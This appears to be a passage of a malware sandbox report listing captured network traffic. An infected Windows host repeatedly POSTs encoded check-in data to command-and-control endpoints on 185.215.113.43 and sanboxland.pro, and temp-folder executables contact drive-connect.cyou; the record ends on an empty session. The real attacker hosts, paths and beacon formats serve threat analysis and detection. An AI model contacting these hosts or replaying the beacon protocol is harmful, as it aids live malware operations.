Dec 13, 2024 18:59:39.825613976 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:41.172374010 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.7	50419	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:42.921904087 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.7	50420	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:44.584992886 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:45.926139116 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.7	50424	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:47.679877043 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:49.028894901 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.7	50425	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:50.662394047 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:52.026953936 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.7	50426	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:53.779179096 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:59:55.139775038 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.7	50427	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:56.788238049 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:59:58.125797033 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.7	50428	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:59:59.876801968 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:01.220429897 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.7	50429	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:02.859467983 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 19:00:04.208973885 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.7	50430	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:05.951642990 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:07.289817095 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.7	50431	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:08.921176910 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 19:00:10.271873951 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.7	50432	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:12.039396048 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:13.380974054 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.7	50433	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:15.027667999 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 19:00:16.376808882 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.7	50434	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:18.132432938 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:19.480839968 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.7	50437	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:21.123828888 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 19:00:22.477094889 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.7	50438	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:24.213299036 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:25.555587053 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.7	50439	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:27.183191061 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 19:00:28.733345032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.7	50440	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:30.477859974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:31.824713945 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.7	50441	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:33.470458984 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.7	50445	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:35.803308964 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:37.135739088 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.7	50446	89.35.131.209	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:36.831476927 CET	161	OUT	POST /3ofn3jf3e2ljk/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sanboxland.pro Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 19:00:38.080427885 CET	197	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 8 <c>3<d>0
Dec 13, 2024 19:00:39.598979950 CET	321	OUT	POST /3ofn3jf3e2ljk/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sanboxland.pro Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 45 36 31 31 36 44 30 38 39 33 37 30 39 35 36 46 31 45 44 46 46 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 31 45 41 42 42 46 45 39 41 32 45 45 45 45 41 34 44 34 39 46 31 33 44 35 34 38 30 33 42 42 42 37 36 45 37 31 39 39 30 30 32 44 42 43 43 30 43 42 39 35 33 31 30 34 45 42 36 46 44 42 30 33 32 30 43 43 35 46 33 38 42 43 46 44 45 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FE6116D089370956F1EDFF6102794AFA17E4CADC3DDBE1EABBFE9A2EEEEA4D49F13D54803BBB76E7199002DBCC0CB953104EB6FDB0320CC5F38BCFDE
Dec 13, 2024 19:00:40.001892090 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.7	50447	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 19:00:38.781559944 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 19:00:40.127191067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 18:00:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49887	104.21.79.7	443	6328	C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:41 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drive-connect.cyou
2024-12-13 17:53:41 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-13 17:53:42 UTC	1020	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oa3j4j545ng2j67farf9oe73c3; expires=Tue, 08-Apr-2025 11:40:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmHCLNiyLITAKuiuzL08Hk0cWAe2c0Gs5LouZFrM%2F%2BduPSw%2B%2BxmfQl3HhznNtG4IzX8OgVeTZRHxbpsJYRXaNzfrieD9J5uX0B2PM5%2FgDegPhxOMPigK18Ha5UDYsz5zFo4rXPI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17d0abda6d15bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1499&rtt_var=573&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1893644&cwnd=113&unsent_bytes=0&cid=df401052067abb7b&ts=1570&x=0"
2024-12-13 17:53:42 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-13 17:53:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49886	149.154.167.99	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
